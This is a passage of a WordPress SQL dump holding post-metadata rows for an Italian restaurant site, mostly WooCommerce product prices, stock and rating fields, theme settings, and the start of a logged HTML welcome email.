40916,98,'_virtual','no'),(40917,98,'_downloadable','no'),(40918,98,'_product_image_gallery',''),(40919,98,'_download_limit','-1'),(40920,98,'_download_expiry','-1'),(40922,98,'_stock',''),(40923,98,'_stock_status','instock'),(40924,98,'_wc_average_rating','3.50'),(40925,98,'_wc_rating_count','a:2:{i:3;i:1;i:4;i:1;}'),(40926,98,'_wc_review_count','2'),(40927,98,'_downloadable_files','a:0:{}'),(40928,98,'_product_attributes','a:0:{}'),(40929,98,'_product_version','3.4.3'),(40930,98,'_price','67'),(40931,98,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40932,98,'mkdf_show_new_sign_woo_meta','no'),(40933,98,'slide_template','default'),(40934,98,'_wpb_vc_js_status','false'),(40935,98,'_wp_old_slug','tuna-with-crispy-artichoke'),(40936,3107,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40937,3107,'_sku','PR0016'),(40938,3107,'_regular_price','73'),(40939,3107,'_sale_price',''),(40940,3107,'_sale_price_dates_from',''),(40941,3107,'_sale_price_dates_to',''),(40942,3107,'total_sales','0'),(40943,3107,'_tax_status','taxable'),(40944,3107,'_tax_class',''),(40945,3107,'_manage_stock','no'),(40946,3107,'_backorders','no'),(40947,3107,'_sold_individually','no'),(40948,3107,'_weight','250'),(40949,3107,'_length',''),(40950,3107,'_width',''),(40951,3107,'_height',''),(40952,3107,'_upsell_ids','a:0:{}'),(40953,3107,'_crosssell_ids','a:0:{}'),(40954,3107,'_purchase_note',''),(40955,3107,'_default_attributes','a:0:{}'),(40956,3107,'_virtual','no'),(40957,3107,'_downloadable','no'),(40958,3107,'_product_image_gallery',''),(40959,3107,'_download_limit','-1'),(40960,3107,'_download_expiry','-1'),(40961,3107,'_thumbnail_id','40'),(40962,3107,'_stock',''),(40963,3107,'_stock_status','instock'),(40964,3107,'_wc_average_rating','5.00'),(40965,3107,'_wc_rating_count','a:1:{i:5;i:1;}'),(40966,3107,'_wc_review_count','1'),(40967,3107,'_downloadable_files','a:0:{}'),(40968,3107,'_product_attributes','a:0:{}'),(40969,3107,'_product_version','3.4.3'),(40970,3107,'_price','73'),(40971,3107,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40972,3107,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40973,3107,'mkdf_show_new_sign_woo_meta','no'),(40974,3107,'slide_template','default'),(40975,3107,'_wpb_vc_js_status','false'),(40976,3108,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40977,3108,'_sku','PR0017'),(40978,3108,'_regular_price','58'),(40979,3108,'_sale_price',''),(40980,3108,'_sale_price_dates_from',''),(40981,3108,'_sale_price_dates_to',''),(40982,3108,'total_sales','0'),(40983,3108,'_tax_status','taxable'),(40984,3108,'_tax_class',''),(40985,3108,'_manage_stock','no'),(40986,3108,'_backorders','no'),(40987,3108,'_sold_individually','no'),(40988,3108,'_weight','315'),(40989,3108,'_length',''),(40990,3108,'_width',''),(40991,3108,'_height',''),(40992,3108,'_upsell_ids','a:0:{}'),(40993,3108,'_crosssell_ids','a:0:{}'),(40994,3108,'_purchase_note',''),(40995,3108,'_default_attributes','a:0:{}'),(40996,3108,'_virtual','no'),(40997,3108,'_downloadable','no'),(40998,3108,'_product_image_gallery',''),(40999,3108,'_download_limit','-1'),(41000,3108,'_download_expiry','-1'),(41001,3108,'_thumbnail_id','41'),(41002,3108,'_stock',''),(41003,3108,'_stock_status','outofstock'),(41004,3108,'_wc_average_rating','3.00'),(41005,3108,'_wc_rating_count','a:1:{i:3;i:1;}'),(41006,3108,'_wc_review_count','1'),(41007,3108,'_downloadable_files','a:0:{}'),(41008,3108,'_product_attributes','a:0:{}'),(41009,3108,'_product_version','3.4.3'),(41010,3108,'_price','58'),(41011,3108,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41012,3108,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41013,3108,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41014,3108,'mkdf_show_new_sign_woo_meta','no'),(41015,3108,'slide_template','default'),(41016,3108,'_wpb_vc_js_status','false'),(41017,3108,'_wp_old_slug','gadabout-with-salad'),(41018,3109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41019,3109,'_sku','PR0018'),(41020,3109,'_regular_price','80'),(41021,3109,'_sale_price','72'),(41022,3109,'_sale_price_dates_from',''),(41023,3109,'_sale_price_dates_to',''),(41024,3109,'total_sales','0'),(41025,3109,'_tax_status','taxable'),(41026,3109,'_tax_class',''),(41027,3109,'_manage_stock','no'),(41028,3109,'_backorders','no'),(41029,3109,'_sold_individually','no'),(41030,3109,'_weight','215'),(41031,3109,'_length',''),(41032,3109,'_width',''),(41033,3109,'_height',''),(41034,3109,'_upsell_ids','a:0:{}'),(41035,3109,'_crosssell_ids','a:0:{}'),(41036,3109,'_purchase_note',''),(41037,3109,'_default_attributes','a:0:{}'),(41038,3109,'_virtual','no'),(41039,3109,'_downloadable','no'),(41040,3109,'_product_image_gallery',''),(41041,3109,'_download_limit','-1'),(41042,3109,'_download_expiry','-1'),(41044,3109,'_stock',''),(41045,3109,'_stock_status','instock'),(41046,3109,'_wc_average_rating','5.00'),(41047,3109,'_wc_rating_count','a:1:{i:5;i:1;}'),(41048,3109,'_wc_review_count','1'),(41049,3109,'_downloadable_files','a:0:{}'),(41050,3109,'_product_attributes','a:0:{}'),(41051,3109,'_product_version','3.4.3'),(41052,3109,'_price','72'),(41053,3109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41054,3109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41055,3109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41056,3109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41057,3109,'mkdf_show_new_sign_woo_meta','no'),(41058,3109,'slide_template','default'),(41059,3109,'_wpb_vc_js_status','false'),(41060,3110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41061,3110,'_sku','PR0019'),(41062,3110,'_regular_price','67'),(41063,3110,'_sale_price',''),(41064,3110,'_sale_price_dates_from',''),(41065,3110,'_sale_price_dates_to',''),(41066,3110,'total_sales','0'),(41067,3110,'_tax_status','taxable'),(41068,3110,'_tax_class',''),(41069,3110,'_manage_stock','no'),(41070,3110,'_backorders','no'),(41071,3110,'_sold_individually','no'),(41072,3110,'_weight','150'),(41073,3110,'_length',''),(41074,3110,'_width',''),(41075,3110,'_height',''),(41076,3110,'_upsell_ids','a:0:{}'),(41077,3110,'_crosssell_ids','a:0:{}'),(41078,3110,'_purchase_note',''),(41079,3110,'_default_attributes','a:0:{}'),(41080,3110,'_virtual','no'),(41081,3110,'_downloadable','no'),(41082,3110,'_product_image_gallery',''),(41083,3110,'_download_limit','-1'),(41084,3110,'_download_expiry','-1'),(41085,3110,'_thumbnail_id','43'),(41086,3110,'_stock',''),(41087,3110,'_stock_status','instock'),(41088,3110,'_wc_average_rating','4.00'),(41089,3110,'_wc_rating_count','a:1:{i:4;i:1;}'),(41090,3110,'_wc_review_count','1'),(41091,3110,'_downloadable_files','a:0:{}'),(41092,3110,'_product_attributes','a:0:{}'),(41093,3110,'_product_version','3.4.3'),(41094,3110,'_price','67'),(41095,3110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41096,3110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41097,3110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41098,3110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41099,3110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41100,3110,'mkdf_show_new_sign_woo_meta','no'),(41101,3110,'slide_template','default'),(41102,3110,'_wpb_vc_js_status','false'),(41103,3111,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41104,3111,'_sku','PR0020'),(41105,3111,'_regular_price','67'),(41106,3111,'_sale_price',''),(41107,3111,'_sale_price_dates_from',''),(41108,3111,'_sale_price_dates_to',''),(41109,3111,'total_sales','0'),(41110,3111,'_tax_status','taxable'),(41111,3111,'_tax_class',''),(41112,3111,'_manage_stock','no'),(41113,3111,'_backorders','no'),(41114,3111,'_sold_individually','no'),(41115,3111,'_weight','150'),(41116,3111,'_length',''),(41117,3111,'_width',''),(41118,3111,'_height',''),(41119,3111,'_upsell_ids','a:0:{}'),(41120,3111,'_crosssell_ids','a:0:{}'),(41121,3111,'_purchase_note',''),(41122,3111,'_default_attributes','a:0:{}'),(41123,3111,'_virtual','no'),(41124,3111,'_downloadable','no'),(41125,3111,'_product_image_gallery',''),(41126,3111,'_download_limit','-1'),(41127,3111,'_download_expiry','-1'),(41129,3111,'_stock',''),(41130,3111,'_stock_status','instock'),(41131,3111,'_wc_average_rating','4.00'),(41132,3111,'_wc_rating_count','a:1:{i:4;i:1;}'),(41133,3111,'_wc_review_count','1'),(41134,3111,'_downloadable_files','a:0:{}'),(41135,3111,'_product_attributes','a:0:{}'),(41136,3111,'_product_version','3.4.3'),(41137,3111,'_price','67'),(41138,3111,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41139,3111,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41140,3111,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41141,3111,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41142,3111,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41143,3111,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41144,3111,'mkdf_show_new_sign_woo_meta','no'),(41145,3111,'slide_template',''),(41146,3111,'_wpb_vc_js_status','false'),(41147,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41148,177,'_sku','PR0021'),(41149,177,'_regular_price','86'),(41150,177,'_sale_price',''),(41151,177,'_sale_price_dates_from',''),(41152,177,'_sale_price_dates_to',''),(41153,177,'total_sales','0'),(41154,177,'_tax_status','taxable'),(41155,177,'_tax_class',''),(41156,177,'_manage_stock','no'),(41157,177,'_backorders','no'),(41158,177,'_sold_individually','no'),(41159,177,'_weight','180'),(41160,177,'_length',''),(41161,177,'_width',''),(41162,177,'_height',''),(41163,177,'_upsell_ids','a:0:{}'),(41164,177,'_crosssell_ids','a:0:{}'),(41165,177,'_purchase_note',''),(41166,177,'_default_attributes','a:0:{}'),(41167,177,'_virtual','no'),(41168,177,'_downloadable','no'),(41169,177,'_product_image_gallery',''),(41170,177,'_download_limit','-1'),(41171,177,'_download_expiry','-1'),(41172,177,'_thumbnail_id','45'),(41173,177,'_stock',''),(41174,177,'_stock_status','instock'),(41175,177,'_wc_average_rating','5.00'),(41176,177,'_wc_rating_count','a:1:{i:5;i:1;}'),(41177,177,'_wc_review_count','1'),(41178,177,'_downloadable_files','a:0:{}'),(41179,177,'_product_attributes','a:0:{}'),(41180,177,'_product_version','3.4.3'),(41181,177,'_price','86'),(41182,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41183,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41184,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41185,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41186,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41187,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41188,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41189,177,'mkdf_show_new_sign_woo_meta','yes'),(41190,177,'slide_template','default'),(41191,177,'_wpb_vc_js_status','false'),(41192,177,'_wp_old_slug','pancakes-with-caviar'),(41193,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41194,180,'_sku','PR0022'),(41195,180,'_regular_price','86'),(41196,180,'_sale_price',''),(41197,180,'_sale_price_dates_from',''),(41198,180,'_sale_price_dates_to',''),(41199,180,'total_sales','0'),(41200,180,'_tax_status','taxable'),(41201,180,'_tax_class',''),(41202,180,'_manage_stock','no'),(41203,180,'_backorders','no'),(41204,180,'_sold_individually','no'),(41205,180,'_weight','230'),(41206,180,'_length',''),(41207,180,'_width',''),(41208,180,'_height',''),(41209,180,'_upsell_ids','a:0:{}'),(41210,180,'_crosssell_ids','a:0:{}'),(41211,180,'_purchase_note',''),(41212,180,'_default_attributes','a:0:{}'),(41213,180,'_virtual','no'),(41214,180,'_downloadable','no'),(41215,180,'_product_image_gallery',''),(41216,180,'_download_limit','-1'),(41217,180,'_download_expiry','-1'),(41219,180,'_stock',''),(41220,180,'_stock_status','instock'),(41221,180,'_wc_average_rating','4.50'),(41222,180,'_wc_rating_count','a:2:{i:4;i:1;i:5;i:1;}'),(41223,180,'_wc_review_count','2'),(41224,180,'_downloadable_files','a:0:{}'),(41225,180,'_product_attributes','a:0:{}'),(41226,180,'_product_version','3.4.3'),(41227,180,'_price','86'),(41228,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41229,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41230,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41231,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41232,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41233,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41234,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41235,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41236,180,'mkdf_show_new_sign_woo_meta','no'),(41237,180,'slide_template','default'),(41238,180,'_wpb_vc_js_status','false'),(41239,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41240,3112,'_sku','PR0023'),(41241,3112,'_regular_price','86'),(41242,3112,'_sale_price',''),(41243,3112,'_sale_price_dates_from',''),(41244,3112,'_sale_price_dates_to',''),(41245,3112,'total_sales','0'),(41246,3112,'_tax_status','taxable'),(41247,3112,'_tax_class',''),(41248,3112,'_manage_stock','no'),(41249,3112,'_backorders','no'),(41250,3112,'_sold_individually','no'),(41251,3112,'_weight','280'),(41252,3112,'_length',''),(41253,3112,'_width',''),(41254,3112,'_height',''),(41255,3112,'_upsell_ids','a:0:{}'),(41256,3112,'_crosssell_ids','a:0:{}'),(41257,3112,'_purchase_note',''),(41258,3112,'_default_attributes','a:0:{}'),(41259,3112,'_virtual','no'),(41260,3112,'_downloadable','no'),(41261,3112,'_product_image_gallery',''),(41262,3112,'_download_limit','-1'),(41263,3112,'_download_expiry','-1'),(41264,3112,'_thumbnail_id','47'),(41265,3112,'_stock',''),(41266,3112,'_stock_status','instock'),(41267,3112,'_wc_average_rating','3.00'),(41268,3112,'_wc_rating_count','a:2:{i:2;i:1;i:4;i:1;}'),(41269,3112,'_wc_review_count','2'),(41270,3112,'_downloadable_files','a:0:{}'),(41271,3112,'_product_attributes','a:0:{}'),(41272,3112,'_product_version','3.4.3'),(41273,3112,'_price','86'),(41274,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41275,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41276,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41277,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41278,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41279,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41280,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41281,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41282,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41283,3112,'mkdf_show_new_sign_woo_meta','no'),(41284,3112,'slide_template','default'),(41285,3112,'_wpb_vc_js_status','false'),(41286,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41287,3113,'_sku','PR0024'),(41288,3113,'_regular_price','86'),(41289,3113,'_sale_price',''),(41290,3113,'_sale_price_dates_from',''),(41291,3113,'_sale_price_dates_to',''),(41292,3113,'total_sales','0'),(41293,3113,'_tax_status','taxable'),(41294,3113,'_tax_class',''),(41295,3113,'_manage_stock','no'),(41296,3113,'_backorders','no'),(41297,3113,'_sold_individually','no'),(41298,3113,'_weight','230'),(41299,3113,'_length',''),(41300,3113,'_width',''),(41301,3113,'_height',''),(41302,3113,'_upsell_ids','a:0:{}'),(41303,3113,'_crosssell_ids','a:0:{}'),(41304,3113,'_purchase_note',''),(41305,3113,'_default_attributes','a:0:{}'),(41306,3113,'_virtual','no'),(41307,3113,'_downloadable','no'),(41308,3113,'_product_image_gallery',''),(41309,3113,'_download_limit','-1'),(41310,3113,'_download_expiry','-1'),(41311,3113,'_thumbnail_id','48'),(41312,3113,'_stock',''),(41313,3113,'_stock_status','instock'),(41314,3113,'_wc_average_rating','5.00'),(41315,3113,'_wc_rating_count','a:1:{i:5;i:1;}'),(41316,3113,'_wc_review_count','1'),(41317,3113,'_downloadable_files','a:0:{}'),(41318,3113,'_product_attributes','a:0:{}'),(41319,3113,'_product_version','3.4.3'),(41320,3113,'_price','86'),(41321,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41322,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41323,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41324,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41325,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41326,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41327,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41328,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41329,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41330,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41331,3113,'mkdf_show_new_sign_woo_meta','no'),(41332,3113,'slide_template','default'),(41333,3113,'_wpb_vc_js_status','false'),(41334,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41335,3114,'_sku','PR0025'),(41336,3114,'_regular_price','86'),(41337,3114,'_sale_price',''),(41338,3114,'_sale_price_dates_from',''),(41339,3114,'_sale_price_dates_to',''),(41340,3114,'total_sales','0'),(41341,3114,'_tax_status','taxable'),(41342,3114,'_tax_class',''),(41343,3114,'_manage_stock','no'),(41344,3114,'_backorders','no'),(41345,3114,'_sold_individually','no'),(41346,3114,'_weight','310'),(41347,3114,'_length',''),(41348,3114,'_width',''),(41349,3114,'_height',''),(41350,3114,'_upsell_ids','a:0:{}'),(41351,3114,'_crosssell_ids','a:0:{}'),(41352,3114,'_purchase_note',''),(41353,3114,'_default_attributes','a:0:{}'),(41354,3114,'_virtual','no'),(41355,3114,'_downloadable','no'),(41356,3114,'_product_image_gallery',''),(41357,3114,'_download_limit','-1'),(41358,3114,'_download_expiry','-1'),(41359,3114,'_thumbnail_id','49'),(41360,3114,'_stock',''),(41361,3114,'_stock_status','instock'),(41362,3114,'_wc_average_rating','1.00'),(41363,3114,'_wc_rating_count','a:1:{i:1;i:1;}'),(41364,3114,'_wc_review_count','1'),(41365,3114,'_downloadable_files','a:0:{}'),(41366,3114,'_product_attributes','a:0:{}'),(41367,3114,'_product_version','3.4.3'),(41368,3114,'_price','86'),(41369,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41370,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41371,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41372,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41373,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41374,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41375,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41376,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41377,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41378,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41379,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41380,3114,'mkdf_show_new_sign_woo_meta','no'),(41381,3114,'slide_template','default'),(41382,3114,'_wpb_vc_js_status','false'),(41385,1670,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(41386,1670,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41387,1670,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(41388,1670,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41389,1670,'slide_template','default'),(41390,1670,'mkdf_page_content_behind_header_meta','no'),(41391,1670,'mkdf_video_type_meta','social_networks'),(41392,1670,'mkdf_audio_type_meta','social_networks'),(41393,1670,'mkdf_disable_vertical_header_background_image_meta','no'),(41394,1670,'mkdf_disable_header_widget_areas_meta','no'),(41395,1670,'mkdf_show_title_area_meta','yes'),(41396,1670,'mkdf_title_area_type_meta','attika'),(41397,1670,'_mkdf-like','0'),(41399,1670,'_wpb_vc_js_status','true'),(41400,1670,'mkdf_page_content_padding','120px 0 0'),(41401,1670,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(41402,1670,'_dp_original','6'),(41403,1670,'mkdf_post_video_link_meta','https://vimeo.com/172791927'),(41404,1670,'_wp_old_slug','big-chefs-recomendations'),(41405,1670,'_wp_old_slug','big-chefs-recomended'),(44558,3972,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(41408,1671,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(41409,1671,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41410,1671,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(41411,1671,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41412,1671,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41413,1671,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(41414,1671,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(41415,1671,'slide_template','default'),(41416,1671,'mkdf_page_content_behind_header_meta','no'),(41417,1671,'mkdf_video_type_meta','social_networks'),(41418,1671,'mkdf_audio_type_meta','social_networks'),(41419,1671,'mkdf_disable_vertical_header_background_image_meta','no'),(41420,1671,'mkdf_disable_header_widget_areas_meta','no'),(41421,1671,'mkdf_show_title_area_meta','yes'),(41422,1671,'mkdf_title_area_type_meta','attika'),(41423,1671,'_mkdf-like','0'),(52197,4365,'_menu_item_type','custom'),(41425,1671,'_wpb_vc_js_status','true'),(41426,1671,'mkdf_page_content_padding','120px 0 0'),(41427,1671,'_dp_original','1670'),(41428,1671,'mkdf_post_quote_text_meta','Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Etiam rhoncus. Maecenas tempus, tellus eget condimentum rhoncus, sem quam semper libero, sit amet adipiscing sem neque.'),(41431,1677,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(41432,1677,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41433,1677,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(41434,1677,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41435,1677,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41436,1677,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(41437,1677,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(41438,1677,'slide_template','default'),(41439,1677,'mkdf_page_content_behind_header_meta','no'),(41440,1677,'mkdf_video_type_meta','social_networks'),(41441,1677,'mkdf_audio_type_meta','social_networks'),(41442,1677,'mkdf_disable_vertical_header_background_image_meta','no'),(41443,1677,'mkdf_disable_header_widget_areas_meta','no'),(41444,1677,'mkdf_show_title_area_meta','yes'),(41445,1677,'mkdf_title_area_type_meta','attika'),(41446,1677,'_mkdf-like','0'),(41448,1677,'_wpb_vc_js_status','true'),(41449,1677,'mkdf_page_content_padding','120px 0 0'),(41450,1677,'mkdf_post_video_link_meta','https://vimeo.com/15306847'),(41451,1677,'_dp_original','1670'),(41452,1677,'mkdf_post_link_link_meta','https://themeforest.net/user/mikado-themes'),(44557,3972,'reply_to_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(41455,1681,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(41456,1681,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41457,1681,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(41458,1681,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41459,1681,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41460,1681,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(41461,1681,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(41462,1681,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(41463,1681,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(41464,1681,'slide_template','default'),(41465,1681,'mkdf_page_content_behind_header_meta','no'),(41466,1681,'mkdf_video_type_meta','social_networks'),(41467,1681,'mkdf_audio_type_meta','self'),(41468,1681,'mkdf_disable_vertical_header_background_image_meta','no'),(41469,1681,'mkdf_disable_header_widget_areas_meta','no'),(41470,1681,'mkdf_show_title_area_meta','yes'),(41471,1681,'mkdf_title_area_type_meta','attika'),(41472,1681,'_mkdf-like','0'),(41474,1681,'_wpb_vc_js_status','true'),(41475,1681,'mkdf_page_content_padding','120px 0 0'),(41476,1681,'mkdf_post_video_link_meta','https://vimeo.com/15306847'),(41477,1681,'_dp_original','1677'),(41478,1681,'mkdf_post_audio_custom_meta','https://www.ristorantesolymar.it/wp-content/uploads/2018/08/b-audio-everytings-nice.mp3'),(41479,1681,'_wp_old_slug','fine-dinning-restaurant'),(44561,3972,'original_message','<!DOCTYPE html>\n<html lang=\"en-US\">\n	<head>\n		<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n		<title>Sol Y Mar</title>\n	</head>\n	<body leftmargin=\"0\" marginwidth=\"0\" topmargin=\"0\" marginheight=\"0\" offset=\"0\" style=\"padding: 0;\">\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-adjust: none;\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" height=\"100%\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0, 0, 0.1); border-radius: 3px;\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1; color: #ffffff; border-bottom: 0; font-weight: bold; line-height: 100%; vertical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radius: 3px 3px 0 0;\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px; display: block;\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color: inherit;\'>Welcome to Sol Y Mar</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd;\">\n												